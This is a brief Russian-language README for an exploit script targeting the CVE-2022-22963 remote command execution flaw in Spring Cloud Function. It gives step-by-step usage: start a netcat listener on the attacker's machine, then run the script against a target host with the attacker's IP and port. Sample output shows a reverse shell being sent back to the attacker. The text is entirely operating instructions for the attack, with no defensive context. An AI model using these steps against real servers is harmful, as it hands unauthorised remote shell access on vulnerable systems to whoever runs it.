
Эксплойт для удаленного выполнения команд CVE-2022-22963 в Spring Cloud Function
Эксплойт для CVE-2022-22963 удалённого выполнения команд в Spring Cloud Function
Подробности об уязвимости см. здесь и здесь
Запустите netcat на вашем хосте:
$ nc -lvnp 9001
Запустите эксплойт (пример) с портом по умолчанию 9001 на хосте атакующего:
$ ./exploit.sh site.com 10.10.14.122
---[Эксплойт Reverse Shell для CVE-2022-22963 (RCE в Spring Cloud Function)]---
[*] Цель: site.com
[*] Атакующий: 10.10.14.122:9001
[*] Готово
Запустите эксплойт (пример) с указанным портом 1337 на хосте атакующего:
$ ./exploit.sh site.com 10.10.14.122 1337
---[Эксплойт Reverse Shell для CVE-2022-22963 (RCE в Spring Cloud Function)]---
[*] Цель: site.com
[*] Атакующий: 10.10.14.122:1337
[*] Готово